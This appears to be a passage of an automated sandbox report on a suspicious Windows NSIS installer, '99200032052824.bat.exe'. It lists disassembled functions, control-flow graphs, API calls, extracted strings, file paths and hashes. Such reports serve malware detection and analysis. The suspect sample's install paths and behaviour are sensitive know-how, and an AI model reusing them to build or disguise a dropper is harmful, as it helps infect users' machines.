                            • DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                            • String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort$Call$Control Panel\Desktop\ResourceLocale$Inquiring Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                            • API String ID: 1975747703-528757914
                            • Opcode ID: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
                            • Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
                            • Opcode Fuzzy Hash: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
                            • Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 364 402d63-402db1 GetTickCount GetModuleFileNameA call 405b39 367 402db3-402db8 364->367 368 402dbd-402deb call 405fa0 call 40597f call 405fa0 GetFileSize 364->368 369 402f95-402f99 367->369 376 402df1 368->376 377 402ed8-402ee6 call 402cff 368->377 379 402df6-402e0d 376->379 384 402ee8-402eeb 377->384 385 402f3b-402f40 377->385 381 402e11-402e1a call 4031ae 379->381 382 402e0f 379->382 389 402e20-402e27 381->389 390 402f42-402f4a call 402cff 381->390 382->381 387 402eed-402f05 call 4031c4 call 4031ae 384->387 388 402f0f-402f39 GlobalAlloc call 4031c4 call 402f9c 384->388 385->369 387->385 410 402f07-402f0d 387->410 388->385 415 402f4c-402f5d 388->415 394 402ea3-402ea7 389->394 395 402e29-402e3d call 405af4 389->395 390->385 399 402eb1-402eb7 394->399 400 402ea9-402eb0 call 402cff 394->400 395->399 413 402e3f-402e46 395->413 406 402ec6-402ed0 399->406 407 402eb9-402ec3 call 4063ef 399->407 400->399 406->379 414 402ed6 406->414 407->406 410->385 410->388 413->399 417 402e48-402e4f 413->417 414->377 418 402f65-402f6a 415->418 419 402f5f 415->419 417->399 421 402e51-402e58 417->421 420 402f6b-402f71 418->420 419->418 420->420 422 402f73-402f8e SetFilePointer call 405af4 420->422 421->399 423 402e5a-402e61 421->423 426 402f93 422->426 423->399 425 402e63-402e83 423->425 425->385 427 402e89-402e8d 425->427 426->369 428 402e95-402e9d 427->428 429 402e8f-402e93 427->429 428->399 430 402e9f-402ea1 428->430 429->414 429->428 430->399
                            APIs
                            • GetTickCount.KERNEL32 ref: 00402D74
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\99200032052824.bat.exe,00000400), ref: 00402D90
                              • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405B3D
                              • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F
                            • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\99200032052824.bat.exe,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00402DDC
                            Strings
                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                            • C:\Users\user\Desktop\99200032052824.bat.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
                            • C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
                            • "C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 00402D63
                            • Null, xrefs: 00402E5A
                            • Error launching installer, xrefs: 00402DB3
                            • soft, xrefs: 00402E51
                            • Inst, xrefs: 00402E48
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                            • String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\99200032052824.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                            • API String ID: 4283519449-116366952
                            • Opcode ID: 6ee9e3ff3a5801a07d03cefed85b7338ced45a2f22c8cd65c9238745d7b7497e
                            • Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
                            • Opcode Fuzzy Hash: 6ee9e3ff3a5801a07d03cefed85b7338ced45a2f22c8cd65c9238745d7b7497e
                            • Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 431 405fc2-405fcd 432 405fe0-405ff6 431->432 433 405fcf-405fde 431->433 434 4061e7-4061eb 432->434 435 405ffc-406007 432->435 433->432 437 4061f1-4061fb 434->437 438 406019-406023 434->438 435->434 436 40600d-406014 435->436 436->434 439 406206-406207 437->439 440 4061fd-406201 call 405fa0 437->440 438->437 441 406029-406030 438->441 440->439 443 406036-40606a 441->443 444 4061da 441->444 445 406070-40607a 443->445 446 406187-40618a 443->446 447 4061e4-4061e6 444->447 448 4061dc-4061e2 444->448 449 406094 445->449 450 40607c-406080 445->450 451 4061ba-4061bd 446->451 452 40618c-40618f 446->452 447->434 448->434 455 40609b-4060a2 449->455 450->449 458 406082-406086 450->458 456 4061cb-4061d8 lstrlenA 451->456 457 4061bf-4061c6 call 405fc2 451->457 453 406191-40619d call 405efe 452->453 454 40619f-4061ab call 405fa0 452->454 469 4061b0-4061b6 453->469 454->469 460 4060a4-4060a6 455->460 461 4060a7-4060a9 455->461 456->434 457->456 458->449 464 406088-40608c 458->464 460->461 467 4060e2-4060e5 461->467 468 4060ab-4060ce call 405e87 461->468 464->449 465 40608e-406092 464->465 465->455 472 4060f5-4060f8 467->472 473 4060e7-4060f3 GetSystemDirectoryA 467->473 479 4060d4-4060dd call 405fc2 468->479 480 40616e-406172 468->480 469->456 471 4061b8 469->471 475 40617f-406185 call 40620a 471->475 477 406165-406167 472->477 478 4060fa-406108 GetWindowsDirectoryA 472->478 476 406169-40616c 473->476 475->456 476->475 476->480 477->476 481 40610a-406114 477->481 478->477 479->476 480->475 486 406174-40617a lstrcatA 480->486 483 406116-406119 481->483 484 40612e-406144 SHGetSpecialFolderLocation 481->484 483->484 488 40611b-406122 483->488 489 406162 484->489 490 406146-406160 SHGetPathFromIDListA CoTaskMemFree 484->490 486->475 492 40612a-40612c 488->492 489->477 490->476 490->489 492->476 492->484
                            APIs
                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060ED
                            • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,004050FF,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000), ref: 00406100
                            • SHGetSpecialFolderLocation.SHELL32(004050FF,75A823A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,004050FF,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000), ref: 0040613C
                            • SHGetPathFromIDListA.SHELL32(75A823A0,Call), ref: 0040614A
                            • CoTaskMemFree.OLE32(75A823A0), ref: 00406156
                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                            • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,004050FF,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,00000000,0041C228,75A823A0), ref: 004061CC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                            • API String ID: 717251189-2516752540
                            • Opcode ID: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
                            • Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
                            • Opcode Fuzzy Hash: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
                            • Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

                            Control-flow Graph

                            APIs
                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand,00000000,00000000,00000031), ref: 00401798
                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand,00000000,00000000,00000031), ref: 004017C2
                              • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Inquiring Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                              • Part of subcall function 004050C7: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                              • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                              • Part of subcall function 004050C7: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,004030F7,004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0), ref: 00405123
                              • Part of subcall function 004050C7: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll), ref: 00405135
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                            • String ID: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp$C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand$Call
                            • API String ID: 1941528284-552088578
                            • Opcode ID: 9b6bbad7b3b488530eb8da8d2fac4795b428d1f2831a164cb9dfb2029ea3a837
                            • Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
                            • Opcode Fuzzy Hash: 9b6bbad7b3b488530eb8da8d2fac4795b428d1f2831a164cb9dfb2029ea3a837
                            • Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 629 4050c7-4050dc 630 405192-405196 629->630 631 4050e2-4050f4 629->631 632 4050f6-4050fa call 405fc2 631->632 633 4050ff-40510b lstrlenA 631->633 632->633 635 405128-40512c 633->635 636 40510d-40511d lstrlenA 633->636 638 40513b-40513f 635->638 639 40512e-405135 SetWindowTextA 635->639 636->630 637 40511f-405123 lstrcatA 636->637 637->635 640 405141-405183 SendMessageA * 3 638->640 641 405185-405187 638->641 639->638 640->641 641->630 642 405189-40518c 641->642 642->630
                            APIs
                            • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                            • lstrlenA.KERNEL32(004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                            • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,004030F7,004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0), ref: 00405123
                            • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll), ref: 00405135
                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll
                            • API String ID: 2531174081-1393834662
                            • Opcode ID: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                            • Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
                            • Opcode Fuzzy Hash: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                            • Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 643 402f9c-402fb0 644 402fb2 643->644 645 402fb9-402fc2 643->645 644->645 646 402fc4 645->646 647 402fcb-402fd0 645->647 646->647 648 402fe0-402fed call 4031ae 647->648 649 402fd2-402fdb call 4031c4 647->649 653 402ff3-402ff7 648->653 654 40319c 648->654 649->648 655 403147-403149 653->655 656 402ffd-403046 GetTickCount 653->656 657 40319e-40319f 654->657 658 403189-40318c 655->658 659 40314b-40314e 655->659 660 4031a4 656->660 661 40304c-403054 656->661 662 4031a7-4031ab 657->662 666 403191-40319a call 4031ae 658->666 667 40318e 658->667 659->660 663 403150 659->663 660->662 664 403056 661->664 665 403059-403067 call 4031ae 661->665 669 403153-403159 663->669 664->665 665->654 677 40306d-403076 665->677 666->654 675 4031a1 666->675 667->666 672 40315b 669->672 673 40315d-40316b call 4031ae 669->673 672->673 673->654 680 40316d-403179 call 405be0 673->680 675->660 679 40307c-40309c call 40645d 677->679 685 4030a2-4030b5 GetTickCount 679->685 686 40313f-403141 679->686 687 403143-403145 680->687 688 40317b-403185 680->688 689 4030b7-4030bf 685->689 690 4030fa-4030fc 685->690 686->657 687->657 688->669 695 403187 688->695 691 4030c1-4030c5 689->691 692 4030c7-4030f2 MulDiv wsprintfA call 4050c7 689->692 693 403133-403137 690->693 694 4030fe-403102 690->694 691->690 691->692 700 4030f7 692->700 693->661 699 40313d 693->699 697 403104-40310b call 405be0 694->697 698 403119-403124 694->698 695->660 703 403110-403112 697->703 702 403127-40312b 698->702 699->660 700->690 702->679 704 403131 702->704 703->687 705 403114-403117 703->705 704->660 705->702
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CountTick$wsprintf
                            • String ID: (TA$(TA$... %d%%
                            • API String ID: 551687249-2950751476
                            • Opcode ID: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                            • Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
                            • Opcode Fuzzy Hash: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                            • Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 706 40558d-4055d8 CreateDirectoryA 707 4055da-4055dc 706->707 708 4055de-4055eb GetLastError 706->708 709 405605-405607 707->709 708->709 710 4055ed-405601 SetFileSecurityA 708->710 710->707 711 405603 GetLastError 710->711 711->709
                            APIs
                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                            • GetLastError.KERNEL32 ref: 004055E4
                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                            • GetLastError.KERNEL32 ref: 00405603
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004055B3
                            • C:\Users\user\Desktop, xrefs: 0040558D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                            • API String ID: 3449924974-1700792911
                            • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                            • Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
                            • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                            • Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 712 4062ca-4062ea GetSystemDirectoryA 713 4062ec 712->713 714 4062ee-4062f0 712->714 713->714 715 406300-406302 714->715 716 4062f2-4062fa 714->716 718 406303-406335 wsprintfA LoadLibraryExA 715->718 716->715 717 4062fc-4062fe 716->717 717->718
                            APIs
                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                            • wsprintfA.USER32 ref: 0040631A
                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: DirectoryLibraryLoadSystemwsprintf
                            • String ID: %s%s.dll$UXTHEME$\
                            • API String ID: 2200240437-4240819195
                            • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                            • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                            • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                            • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 719 405b68-405b72 720 405b73-405b9e GetTickCount GetTempFileNameA 719->720 721 405ba0-405ba2 720->721 722 405bad-405baf 720->722 721->720 723 405ba4 721->723 724 405ba7-405baa 722->724 723->724
                            APIs
                            • GetTickCount.KERNEL32 ref: 00405B7C
                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6B
                            • nsa, xrefs: 00405B73
                            • "C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 00405B68
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
